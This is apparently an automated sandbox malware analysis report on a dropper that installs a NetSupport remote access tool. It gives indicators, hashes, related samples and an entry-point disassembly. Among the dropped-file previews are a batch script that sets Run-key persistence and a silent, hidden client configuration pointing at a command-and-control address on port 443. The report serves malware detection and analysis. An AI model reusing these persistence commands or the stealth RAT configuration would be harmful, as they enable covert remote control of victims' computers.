http://%s/testpage.htm | 0% | Avira URL Cloud | safe
http://www.pci.co.uk/supportsupport | 0% | Avira URL Cloud | safe
http://127.0.0.1RESUMEPRINTING | 0% | Avira URL Cloud | safe
http://%s/fakeurl.htm | 0% | Avira URL Cloud | safe
http://www.netsupportschool.com/tutor-assistant.asp | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
geo.netsupportsoftware.com | 104.26.1.231 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
http://45.76.253.210/fakeurl.htm | true | Avira URL Cloud: safe | unknown
http://geo.netsupportsoftware.com/location/loca.asp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
45.76.253.210 | unknown | United States | 20473 | AS-CHOOPAUS | true
104.26.1.231 | geo.netsupportsoftware.com | United States | 13335 | CLOUDFLARENETUS | false
                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                  Analysis ID:1580475
                                                                  Start date and time:2024-12-24 17:36:06 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 9m 48s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:13
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
                                                                  Detection:MAL
                                                                  Classification:mal96.rans.evad.winEXE@14/12@1/2
                                                                  EGA Information:
                                                                  • Successful, ratio: 100%
                                                                  HCA Information:
                                                                  • Successful, ratio: 81%
                                                                  • Number of executed functions: 210
                                                                  • Number of non-executed functions: 154
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe
                                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                  • Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.63
                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; report is missing behavior information
                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                  • VT rate limit hit for: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
Time | Type | Description
11:37:33 | API Interceptor | 18129566x Sleep call for process: bild.exe modified
16:37:04 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Netstat C:\Users\Public\Netstat\bild.exe
16:37:12 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Netstat C:\Users\Public\Netstat\bild.exe
16:37:20 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Netstat C:\Users\Public\Netstat\bild.exe
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.26.1.231 | Merge.exe | malicious | NetSupport RAT | geo.netsupportsoftware.com/location/loca.asp
104.26.1.231 | 5q1Wm5VlqL.exe | malicious | NetSupport RAT | geo.netsupportsoftware.com/location/loca.asp
104.26.1.231 | Update.js | malicious | NetSupport RAT | geo.netsupportsoftware.com/location/loca.asp
104.26.1.231 | file.exe | malicious | NetSupport RAT | geo.netsupportsoftware.com/location/loca.asp
104.26.1.231 | Pyyidau.vbs | malicious | NetSupport RAT | geo.netsupportsoftware.com/location/loca.asp
104.26.1.231 | file.exe | malicious | NetSupport RAT | geo.netsupportsoftware.com/location/loca.asp
104.26.1.231 | file.exe | malicious | NetSupport RAT | geo.netsupportsoftware.com/location/loca.asp
104.26.1.231 | CiscoSetup.exe | malicious | NetSupport RAT, NetSupport Downloader | geo.netsupportsoftware.com/location/loca.asp
104.26.1.231 | Advanced_IP_Scanner_2.5.4594.12.exe | malicious | NetSupport RAT, NetSupport Downloader | geo.netsupportsoftware.com/location/loca.asp
104.26.1.231 | Advanced_IP_Scanner_2.5.4594.12.exe | malicious | NetSupport RAT, NetSupport Downloader | geo.netsupportsoftware.com/location/loca.asp

Match | Associated Sample Name / URL | Detection | Threat Name | Context
geo.netsupportsoftware.com | file.exe | malicious | NetSupport RAT, LummaC, Amadey, LummaC Stealer | 104.26.0.231
geo.netsupportsoftware.com | 5j0fix05fy.js | malicious | NetSupport RAT | 104.26.0.231
geo.netsupportsoftware.com | Merge.exe | malicious | NetSupport RAT | 104.26.1.231
geo.netsupportsoftware.com | lFxGd66yDa.exe | malicious | NetSupport RAT | 104.26.0.231
geo.netsupportsoftware.com | Jjv9ha2GKn.exe | malicious | NetSupport RAT, DarkTortilla | 104.26.0.231
geo.netsupportsoftware.com | 5q1Wm5VlqL.exe | malicious | NetSupport RAT | 104.26.1.231
geo.netsupportsoftware.com | Update.js | malicious | NetSupport RAT | 104.26.1.231
geo.netsupportsoftware.com | file.exe | malicious | NetSupport RAT | 104.26.0.231
geo.netsupportsoftware.com | file.exe | malicious | NetSupport RAT | 104.26.1.231
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\Public\Netstat\HTCTL32.DLL | https://tekascend.com/Ray-verify.html | malicious | NetSupport RAT
C:\Users\Public\Netstat\HTCTL32.DLL | file.exe | malicious | NetSupport RAT, LummaC, Amadey, Blank Grabber, LummaC Stealer, PureLog Stealer
C:\Users\Public\Netstat\HTCTL32.DLL | file.exe | malicious | NetSupport RAT, LummaC, Amadey, LummaC Stealer
C:\Users\Public\Netstat\HTCTL32.DLL | lFxGd66yDa.exe | malicious | NetSupport RAT
C:\Users\Public\Netstat\HTCTL32.DLL | Jjv9ha2GKn.exe | malicious | NetSupport RAT, DarkTortilla
C:\Users\Public\Netstat\HTCTL32.DLL | 5q1Wm5VlqL.exe | malicious | NetSupport RAT
C:\Users\Public\Netstat\HTCTL32.DLL | file.exe | malicious | NetSupport RAT
C:\Users\Public\Netstat\HTCTL32.DLL | file.exe | malicious | NetSupport RAT
C:\Users\Public\Netstat\HTCTL32.DLL | file.exe | malicious | NetSupport RAT
                                                                                    Process:C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):328056
                                                                                    Entropy (8bit):6.754723001562745
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:2ib5YbsXPKXd6ppGpwpbGf30IVFpSzyaHx3/4aY5dUilQpAf84lH0JYBAnM1OK/Y:2ib5YbsXioEgULFpSzya9/lY5SilQCfg
                                                                                    MD5:2D3B207C8A48148296156E5725426C7F
                                                                                    SHA1:AD464EB7CF5C19C8A443AB5B590440B32DBC618F
                                                                                    SHA-256:EDFE2B923BFB5D1088DE1611401F5C35ECE91581E71503A5631647AC51F7D796
                                                                                    SHA-512:55C791705993B83C9B26A8DBD545D7E149C42EE358ECECE638128EE271E85B4FDBFD6FBAE61D13533BF39AE752144E2CC2C5EDCDA955F18C37A785084DB0860C
                                                                                    Malicious:false
                                                                                    Yara Hits:
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\HTCTL32.DLL, Author: Joe Security
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 3%
Joe Sandbox View:
• Filename: , Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: lFxGd66yDa.exe, Detection: malicious
• Filename: Jjv9ha2GKn.exe, Detection: malicious
• Filename: 5q1Wm5VlqL.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
                                                                                    Reputation:moderate, very likely benign file
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A...A...A.......A...9...A...A..gA....1..A....0.A.......A.......A.......A..Rich.A..........PE..L.....V...........!.................Z.......................................P......=G....@......................... ...k....y..x.......@...............x).......0..................................._..@............................................text............................... ..`.rdata..............................@..@.data....f.......(...v..............@....rsrc...@...........................@..@.reloc..b1.......2..................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):257
                                                                                    Entropy (8bit):5.119720931145611
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:O/oPn4xRPjwx1lDKHMoEEjLgpW2MezvLdNWYpPM/ioVLa8l6i7s:XeR7wx6JjjqW2MePBPM/ioU8l6J
                                                                                    MD5:7067AF414215EE4C50BFCD3EA43C84F0
                                                                                    SHA1:C331D410672477844A4CA87F43A14E643C863AF9
                                                                                    SHA-256:2050CC232710A2EA6A207BC78D1EAC66A4042F2EE701CDFEEE5DE3DDCDC31D12
                                                                                    SHA-512:17B888087192BCEA9F56128D0950423B1807E294D1C4F953D1BF0F5BD08E5F8E35AFEEE584EBF9233BFC44E0723DB3661911415798159AC118C8A42AAF0B902F
                                                                                    Malicious:false
                                                                                    Preview:1200..0x3bcb348e....; NetSupport License File...; Generated on 11:54 - 21/03/2018........[[Enforce]]....[_License]..control_only=0..expiry=..inactive=0..licensee=EVALUSION..maxslaves=5000..os2=1..product=10..serial_no=NSM165348..shrink_wrap=0..transport=0..
                                                                                    Process:C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):18808
                                                                                    Entropy (8bit):6.22028391196942
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:1ANeiOT8Z2b6SoVF6RRHaPrpF3o47jtd3hfwHjvud3hfwx7bjuh:1ANt+E2exrpxTSDuTuih
                                                                                    MD5:A0B9388C5F18E27266A31F8C5765B263
                                                                                    SHA1:906F7E94F841D464D4DA144F7C858FA2160E36DB
                                                                                    SHA-256:313117E723DDA6EA3911FAACD23F4405003FB651C73DE8DEFF10B9EB5B4A058A
                                                                                    SHA-512:6051A0B22AF135B4433474DC7C6F53FB1C06844D0A30ED596A3C6C80644DF511B023E140C4878867FA2578C79695FAC2EB303AEA87C0ECFC15A4AD264BD0B3CD
                                                                                    Malicious:false
                                                                                    Yara Hits:
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\PCICHEK.DLL, Author: Joe Security
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......sv..7.d.7.d.7.d.,...5.d.,...4.d.>o..0.d.7.e...d.,...3.d.,...6.d.,...6.d.,...6.d.Rich7.d.........PE..L...f..U...........!......................... ...............................`............@.........................p"..a.... ..P....@............... ..x)...P......@ ............................................... ..@............................text...$........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):3735416
                                                                                    Entropy (8bit):6.525042992590476
                                                                                    Encrypted:false
                                                                                    SSDEEP:49152:cTXNZ+0ci2aYNT8wstdAukudJ1xTvIZamclSp+73mPu:cTXNo0cpKwstTJIkS43mm
                                                                                    MD5:00587238D16012152C2E951A087F2CC9
                                                                                    SHA1:C4E27A43075CE993FF6BB033360AF386B2FC58FF
                                                                                    SHA-256:63AA18C32AF7144156E7EE2D5BA0FA4F5872A7DEB56894F6F96505CBC9AFE6F8
                                                                                    SHA-512:637950A1F78D3F3D02C30A49A16E91CF3DFCCC59104041876789BD7FDF9224D187209547766B91404C67319E13D1606DA7CEC397315495962CBF3E2CCD5F1226
                                                                                    Malicious:true
                                                                                    Yara Hits:
                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\Public\Netstat\PCICL32.DLL, Author: Joe Security
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\PCICL32.DLL, Author: Joe Security
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 12%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........(.t.I.'.I.'.I.'A..'.I.'...'.I.'.?#'.I.'...'.I.'.1.'.I.'.I.'.J.'.1.'.I.'.1.'.I.'..#',I.'.."'.I.'...'.I.'...'.I.'...'.I.'Rich.I.'................PE..L......V...........!......... ..............0................................9.....f-9.....................................4........`................8.x)...P7.p....@.......................P.......P..@............0..........`....................text............................... ..`.rdata.......0......................@..@.data....%..........................@....tls.........@......................@....hhshare.....P......................@....rsrc........`......................@..@.reloc..(2...P7..4....6.............@..B........................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):396664
                                                                                    Entropy (8bit):6.809064783360712
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:OpwbUb48Ju0LIFZB4Qaza4yFaMHAZtJ4Yew2j/bJa+neNQ:epq7BaGIn4BbLneNQ
                                                                                    MD5:EAB603D12705752E3D268D86DFF74ED4
                                                                                    SHA1:01873977C871D3346D795CF7E3888685DE9F0B16
                                                                                    SHA-256:6795D760CE7A955DF6C2F5A062E296128EFDB8C908908EDA4D666926980447EA
                                                                                    SHA-512:77DE0D9C93CCBA967DB70B280A85A770B3D8BEA3B707B1ABB037B2826B48898FEC87924E1A6CCE218C43478E5209E9EB9781051B4C3B450BEA3CD27DBD32C7F3
                                                                                    Malicious:true
                                                                                    Yara Hits:
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\TCCTL32.DLL, Author: Joe Security
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............z..z..z.....z.....z.....z..{.Y.z....K.z......z.....z......z.....z.Rich.z.........PE..L...Y?XV...........!................................................................'.....@.............................o...T...x....0..@...............x)...@..\E..................................`d..@...............h............................text............................... ..`.rdata../...........................@..@.data...h............|..............@....rsrc...@....0......................@..@.reloc.. F...@...H..................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):105848
                                                                                    Entropy (8bit):4.68250265552195
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:qTjV5+6j6Qa86Fkv2Wr120hZIqeTSGRp2TkFimMP:qHVZl6FhWr80/heT8TkFiH
                                                                                    MD5:8D9709FF7D9C83BD376E01912C734F0A
                                                                                    SHA1:E3C92713CE1D7EAA5E2B1FABEB06CDC0BB499294
                                                                                    SHA-256:49A568F8AC11173E3A0D76CFF6BC1D4B9BDF2C35C6D8570177422F142DCFDBE3
                                                                                    SHA-512:042AD89ED2E15671F5DF67766D11E1FA7ADA8241D4513E7C8F0D77B983505D63EBFB39FEFA590A2712B77D7024C04445390A8BF4999648F83DBAB6B0F04EB2EE
                                                                                    Malicious:true
                                                                                    Yara Hits:
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\bild.exe, Author: Joe Security
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 29%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............i...i...i.......i..6....i...h...i..6...i..6..i..6....i.Rich..i.........................PE..L...T..U.....................n...... ........ ....@..................................K....@.................................< ..<....0...i...........t..x).......... ............................................... ...............................text............................... ..`.rdata..V.... ......................@..@.rsrc....i...0...j..................@..@.reloc..l............r..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):701
                                                                                    Entropy (8bit):5.5326954211374355
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:yZqzd+mPZGS/py6z8BlsVTXuZ7+DP981E7GXXfDWQClnmSuYIAlkz6:QqzEmPZly6YBlLoG1fXXfDirIAaz6
                                                                                    MD5:0F81A0520491093CA88F974D4FBAFE11
                                                                                    SHA1:555B4DCF7612435066DE5B5DC319855A48D5EAF7
                                                                                    SHA-256:2C27FB0A37F8BDFCCE98DAB852DEE3C2950C9810394A441A19ECE63C64DAF818
                                                                                    SHA-512:7B68AE33017D28A37982E718F0393FF7047C43B50AAD595D48A0AC61268D6D4162319D8B41B9997B577649D323206A4764E5D502CBC3715DAD35692253D8A9E0
                                                                                    Malicious:false
                                                                                    Preview:0x137310df....[Client].._present=1..DisableChatMenu=1..DisableClientConnect=1..DisableDisconnect=1..DisableLocalInventory=1..DisableReplayMenu=1..DisableRequestHelp=1..HideWhenIdle=1..Protocols=3..RADIUSSecret=dgAAAOeJWid73S6SvOyjjiTDVewA..RoomSpec=Eval..ShowUIOnConnect=0..silent=1..SKMode=1..SOS_Alt=0..SOS_LShift=0..SOS_RShift=0..SysTray=0..UnloadMirrorOnDisconnect=1..Usernames=*....[_Info]..Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32u.ini....[_License]..quiet=1....[Audio]..DisableAudioFilter=1....[General]..BeepUsingSpeaker=0......[HTTP]..GatewayAddress=45.76.253.210:443..gsk=EFHH;K>OBDEJ9A<I@BCB..gskmode=0..gsku=EFHH;K>OBDEJ9A<I@BCB..GSKX=EFHH;K>OBDEJ9A<I@BCB....
                                                                                    Process:C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):773968
                                                                                    Entropy (8bit):6.901559811406837
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:nMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BVoe3z:MmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV7z
                                                                                    MD5:0E37FBFA79D349D672456923EC5FBBE3
                                                                                    SHA1:4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
                                                                                    SHA-256:8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
                                                                                    SHA-512:2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L......M.........."!.........................0.....x......................................@..........................H......d...(.......................P.......$L...!..8...........................hE..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
                                                                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):282
                                                                                    Entropy (8bit):5.151957838855328
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:hwszH1j0KpIAgidquH2QcfoZH1j0KpIAgidquH2QW3A:HVj0Kprgidqu++Vj0Kprgidqu2w
                                                                                    MD5:7604BB3E3698A7074FF39ECA4195391F
                                                                                    SHA1:F07E84CED88C3076B7A295FD845F7E420DCC3AF8
                                                                                    SHA-256:FE14D5B612CC516A7DDE97E3FE93FE35573F808B036E9C9513FCEADCB1BCC751
                                                                                    SHA-512:8639E1079F8E2DFD6AFB7CDCF4C6326B514A10C41841BEE035F62BA2234E60F13625515588787339CE1C469925595060EA2A9A1F2B3A60AA0D378F00540872C6
                                                                                    Malicious:true
                                                                                    Preview:@echo off..REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "%Public%\Netstat\bild.exe"..REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "%Public%\Netstat\bild.exe"..start %Public%\Netstat\bild.exe..
                                                                                    Process:C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
                                                                                    File Type:Windows setup INFormation
                                                                                    Category:dropped
                                                                                    Size (bytes):328
                                                                                    Entropy (8bit):4.93007757242403
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:a0S880EeLL6sWqYFcf8KYFEAy1JoHBIr2M2OIAXFYJKRLIkg/LH2yi9vyifjBLWh:JShNvPG1JoHBx2XFhILH4Burn
                                                                                    MD5:26E28C01461F7E65C402BDF09923D435
                                                                                    SHA1:1D9B5CFCC30436112A7E31D5E4624F52E845C573
                                                                                    SHA-256:D96856CD944A9F1587907CACEF974C0248B7F4210F1689C1E6BCAC5FED289368
                                                                                    SHA-512:C30EC66FECB0A41E91A31804BE3A8B6047FC3789306ADC106C723B3E5B166127766670C7DA38D77D3694D99A8CDDB26BC266EE21DBA60A148CDF4D6EE10D27D7
                                                                                    Malicious:false
                                                                                    Preview:; nskbfltr.inf..;..; NS Keyboard Filter..; ..;..; This inf file installs the WDF Framework binaries....[Version]..Signature="$Windows NT$"..Provider=NSL......;..;--- nskbfltr Coinstaller installation ------..;......[nskbfltr.NT.Wdf]..KmdfService = nskbfltr, nskbfltr_wdfsect....[nskbfltr_wdfsect]..KmdfLibraryVersion = 1.5......
                                                                                    Process:C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):33144
                                                                                    Entropy (8bit):6.737780491933496
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:FFvNhAyi5hHA448qZkSn+EgT8To1iTYiu:FCyoHA448qSSzgI2GQ
                                                                                    MD5:DCDE2248D19C778A41AA165866DD52D0
                                                                                    SHA1:7EC84BE84FE23F0B0093B647538737E1F19EBB03
                                                                                    SHA-256:9074FD40EA6A0CAA892E6361A6A4E834C2E51E6E98D1FFCDA7A9A537594A6917
                                                                                    SHA-512:C5D170D420F1AEB9BCD606A282AF6E8DA04AE45C83D07FAAACB73FF2E27F4188B09446CE508620124F6D9B447A40A23620CFB39B79F02B04BB9E513866352166
                                                                                    Malicious:true
                                                                                    Yara Hits:
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\pcicapi.dll, Author: Joe Security
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+-..E~..E~..E~.\.~..E~.\.~..E~...~..E~..D~..E~.\.~..E~.\.~..E~.\.~..E~.\.~..E~...~..E~.\.~..E~Rich..E~........PE..L......U...........!.....2...........<.......P...............................`............@..........................^.......W..d....@..x............X..x)...P......`Q...............................V..@............P..@............................text....1.......2.................. ..`.rdata.......P.......6..............@..@.data...,....`.......F..............@....rsrc...x....@.......H..............@..@.reloc.......P.......P..............@..B........................................................................................................................................................................................................................................................................................................................
Process: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
File Type: PE32 executable (console) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 77224
Entropy (8bit): 6.793971095882093
Encrypted: false
SSDEEP: 1536:zfafvTuNOwphKuyUHTqYXHhrXH4+LIyrxomee/+5IrAee/DIr3:jafLSpAFUzt0+LIyr7eR5IUeCIz
MD5: 325B65F171513086438952A152A747C4
SHA1: A1D1C397902FF15C4929A03D582B09B35AA70FC0
SHA-256: 26DBB528C270C812423C3359FC54D13C52D459CC0E8BC9B0D192725EDA34E534
SHA-512: 6829555AB3851064C3AAD2D0C121077DB0260790B95BF087B77990A040FEBD35B8B286F1593DCCAA81B24395BD437F5ADD02037418FD5C9C8C78DC0989A9A10D
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 13%
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.940363800405678
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
File size: 2'138'135 bytes
MD5: 47cfce938a71540a2039aebd5abe0783
SHA1: 641d20b31f5b2aba11746d1e533cbe4d4ee9c6ed
SHA256: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d582b6d0b6f188306954
SHA512: 338c95a30ccfbfe81b9a12d6ce01a68fdc3ace65da5fff17ccd06dbb4aa135cdf5ce3947107fd2ea46d32406bf6b30c908b6af673268b7c2ca554a7b67ddd4a1
SSDEEP: 49152:VIf96RO0EkHbG+xw6NbHHBp7k5hhelN6YawnqLKwgVRl:VIFP6wYt5ShAiYawbwW
TLSH: CBA52302F9C6C5B2D53308390A68AB55797DBF342F28DD6FA78D5E1ACA301917338A53
Icon Hash: 1515d4d4442f2d2d
Entrypoint: 0x41d779
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp: 0x5C72EA7E [Sun Feb 24 19:03:26 2019 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 00be6e6c4f9e287672c8301b72bdabf3
Instruction:
                                                                                    call 00007FF324E6C4CFh
                                                                                    jmp 00007FF324E6BEC3h
                                                                                    cmp ecx, dword ptr [0043A1C8h]
                                                                                    jne 00007FF324E6C035h
                                                                                    ret
                                                                                    jmp 00007FF324E6C646h
                                                                                    and dword ptr [ecx+04h], 00000000h
                                                                                    mov eax, ecx
                                                                                    and dword ptr [ecx+08h], 00000000h
                                                                                    mov dword ptr [ecx+04h], 00430FE8h
                                                                                    mov dword ptr [ecx], 00431994h
                                                                                    ret
                                                                                    push ebp
                                                                                    mov ebp, esp
                                                                                    push esi
                                                                                    push dword ptr [ebp+08h]
                                                                                    mov esi, ecx
                                                                                    call 00007FF324E5F5CDh
                                                                                    mov dword ptr [esi], 004319A0h
                                                                                    mov eax, esi
                                                                                    pop esi
                                                                                    pop ebp
                                                                                    retn 0004h
                                                                                    and dword ptr [ecx+04h], 00000000h
                                                                                    mov eax, ecx
                                                                                    and dword ptr [ecx+08h], 00000000h
                                                                                    mov dword ptr [ecx+04h], 004319A8h
                                                                                    mov dword ptr [ecx], 004319A0h
                                                                                    ret
                                                                                    lea eax, dword ptr [ecx+04h]
                                                                                    mov dword ptr [ecx], 00431988h
                                                                                    push eax
                                                                                    call 00007FF324E6F1DEh
                                                                                    pop ecx
                                                                                    ret
                                                                                    push ebp
                                                                                    mov ebp, esp
                                                                                    push esi
                                                                                    mov esi, ecx
                                                                                    lea eax, dword ptr [esi+04h]
                                                                                    mov dword ptr [esi], 00431988h
                                                                                    push eax
                                                                                    call 00007FF324E6F1C7h
                                                                                    test byte ptr [ebp+08h], 00000001h
                                                                                    pop ecx
                                                                                    je 00007FF324E6C03Ch
                                                                                    push 0000000Ch
                                                                                    push esi
                                                                                    call 00007FF324E6B602h
                                                                                    pop ecx
                                                                                    pop ecx
                                                                                    mov eax, esi
                                                                                    pop esi
                                                                                    pop ebp
                                                                                    retn 0004h
                                                                                    push ebp
                                                                                    mov ebp, esp
                                                                                    sub esp, 0Ch
                                                                                    lea ecx, dword ptr [ebp-0Ch]
                                                                                    call 00007FF324E6BF9Eh
                                                                                    push 00437B58h
                                                                                    lea eax, dword ptr [ebp-0Ch]
                                                                                    push eax
                                                                                    call 00007FF324E6E8C6h
                                                                                    int3
                                                                                    push ebp
                                                                                    mov ebp, esp
                                                                                    sub esp, 0Ch
